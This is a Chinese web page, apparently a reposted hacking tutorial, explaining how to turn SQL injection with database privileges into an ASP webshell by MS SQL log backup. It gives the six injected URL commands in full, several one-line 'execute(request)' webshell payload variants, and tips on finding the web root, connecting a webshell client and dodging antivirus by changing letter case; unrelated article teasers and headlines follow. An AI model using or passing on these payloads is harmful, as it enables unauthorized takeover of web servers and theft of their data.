log备份不能闭合 log备份的闭合问题如何解决?
当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也好让我们对不能闭合的方法有一个全面的了解.
1.先介绍下LOG备份,这个相信大家都很熟悉了,我还是习惯在IE里直接提交,返回正常的页面就说这一步的操作就成功了,如果没有返回正常的页面,我们就可以根据IE返回的错误来找他的原因.(这里说下要将IE的错误提示给打开),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--
分为6步操作,最容易出错的就是第4步的操作,经常返回没有闭合的问题,下面就是一些我们可以将
values中的内容可以进行更换的方式,当我们的一种方式不行的话,就可以换另一种方式,当所有的方式
都换完了,没有什么好说的,要么就放弃,要么就换另一种方式继续,想列目录找数据库下载,后台.这
里就不多说了,可以提换的内容有:
a).<%%execute(request("go"))%%>
b).<%execute(request("go"))%>
c).%><%execute><%
d).
2.LOG备份要注意的一些问题:
a).要注意你现在的机器是不是WEB主机,简单的方法就是翻他的目录,看有没有IIS安装的文件
b).当你确定你要找的确实是WEN主机时,就可以找他的站点目录了,这个也很重要,是步骤5的操作,如果备份到一个错误的目录,当然就没有办法访问了
c).备份成功后,你就可以试着用客户端去连接,这个地方也有人弄错,现在用的字段是go,你的客户端的
相关字段也为go
d).用ececute正常备份出来的是用错误提示的,当你的显示500错误时,请你将的IE错误提示打开,当显示
Microsoft VBScript 运行时错误 错误 800a000d
类型不匹配: execute
时候表示你已经成功了,连接吧!!
e).还有极端的时候你备份出来的一句话被杀(当你确定你确实是备份在WEB主机的对应目录是),你可以将
上面的VALUES字段中的值做几个大小写转换,一般是没有问题的..
wordpress教程 教你修复存在wordpress4.0以下版本的跨站脚本漏洞?
该漏洞是由芬兰IT公司Klikki Oy的CEO Jouko Pynnonen发现的,只存在于Wordpress4 0以下的版本中。据调查得知全球有86%的Wordpress网站都感染了这一漏洞,也就意味着全球数百万的网站都存在着潜在的危险。一些
详情2018-01-20 14:28:46责编:llp 来源:驱动管家boblog漏洞代码 boblog任意变量覆盖漏洞分析
BoBlogBoBlog是一款基于PHP的、以MySQL为数据库支持的免费blog程序,存在着任意变量覆盖漏洞。该漏洞代码如下: go php$q_url=$_SERVER[ "REQUEST_URI "];@list($relativePath, $rawURL)=@explode(& 39; go php
详情2018-01-26 17:05:29责编:llp 来源:驱动管家mcafee 8.5怎么安装?mcafee 8.5又是怎么设置规则?
Mcafee(麦咖啡)与Norton(诺顿)、Kaspersky(卡巴斯基)并称为世界三大杀毒软件,是一款非常优秀的杀软。其监控能力和保护规则相当强大,是同类软件中最好的。是我非常推崇的一款杀软。Mcafee的精髓就在于规则
详情2018-01-23 11:05:23责编:llp 来源:驱动管家键盘安全问题 如何保护从键盘输入的数据?
键盘安全问题及危害通过各种黑客技术,黑客可以通过远程控制在用户的电脑中安装记录键盘的程序,这些被称作键盘记录器的工具可以记录用户从键盘输入的所有信息。由于当前黑客技术日益公开化,以至于即使是黑客初
详情2018-02-09 11:41:48责编:llp 来源:驱动管家什么是正向连接木马?什么是反弹连接木马?
目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他机器上开的端口由于到
详情2018-02-14 08:51:30责编:llp 来源:驱动管家rar密码破解工具:rar password recovery如何破解rar文件密码?
RAR是一款常见的压缩格式,主要运用于文件的存储与传递。互联网上提供下载的资源中,RAR格式占很大比重。出于安全的需求以及隐私的保护,有相当一部分的RAR文件被加上了密码,解不开密码的RAR文件如同垃圾文件一
详情2018-01-15 12:34:15责编:llp 来源:驱动管家什么是加密?加密与数字签名有何区别?
什么是加密?用非常基本的词汇说,加密是一种以密码方式发送信息的方法。只有拥有正确密钥的人才能解开这个信息的密码。对于其他人来说,这个信息看起来就像是一系列随机的字母、数字和符号。如果你要发送不应该让
详情2018-01-22 14:56:19责编:llp 来源:驱动管家虚拟主机的危机 hzhost虚拟主机有什么致命漏洞?
编者注:HZHOST虚拟主机管理系统,在国内的虚拟主机应用比较广泛,但是存了这样的一个漏洞让人觉得心惊,也让整个虚拟主机系统沦陷。千里之堤,毁于蚁穴!在此提醒各位网络管理员(站长),在做好系统的维护的同
详情2018-01-13 08:49:38责编:llp 来源:驱动管家遗忘密码怎么办?十二种密码遗忘的解决方法是什么?
在日常操作中,我们经常要输入各种各样的密码,例 如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这 些密码,就有可能用不了机器、打不开文件、不能聊天 。也许还会造成很大的损失!下面我们就介绍电
详情2018-02-04 18:03:47责编:llp 来源:驱动管家wapiti是什么?轻量级wapiti能检测出哪些漏洞?
Wapiti是Web应用程序漏洞错误检查工具。它具有“暗箱操作”扫描,即它不关心Web应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。它用于检测网页,看脚本是否脆弱的。Wapiti是一个开
详情2018-01-23 09:55:08责编:llp 来源:驱动管家
- 拨号连接关不掉的原因是什么?拨号连接关不掉怎么办?
- 打印机驱动怎样快速安装?怎样利用驱动人生安装打印机驱动?
- AMD R7-1700X处理器和Intel i7-7800X处理器测评 R7-1700X和i7-7800X比较
- “索尼业已复兴”?索尼的营业利润将创72年来最高纪录
- 【游戏攻略】沙漠打野很穷?被遗忘的左上角富得流油
- 【游戏攻略】值得注意的小细节 学到后吃鸡率提升一倍
- Win10系统的控制面板在哪里?win10系统找不到控制面板怎么办
- 网页图片为什么显示不出来?网页图片无法显示怎么解决
- 神舟x60ts配置参数 神舟x60ts支持双卡双待吗?
- 金立s10b什么时候上市?采用什么处理器?
- 怎么查看ip地址?本机ip地址查看的方法有哪些?
- 本地连接ip设置怎么做?本地连接ip地址设置方法
- 拨号连接关不掉是怎么回事?拨号连接为什么总是自动弹出?
- Facebook将推新技术 可识别有自杀倾向的用户
- 【游戏资讯】2月22日正式服 左下方显示机舱内玩家数
- 【游戏攻略】绝地求生主副武器选择 四种必备搭配方式
- Win7能不能直接升级到win10?win7系统怎么升级到win10系统
- 电脑提示“nvidia安装程序无法继续” 如何解决
- 金立s11s和金立s11的对比数据 买金立s11s还是金立s11?
- qq邮件发送错误怎么撤回?qq邮件撤回方法是什么?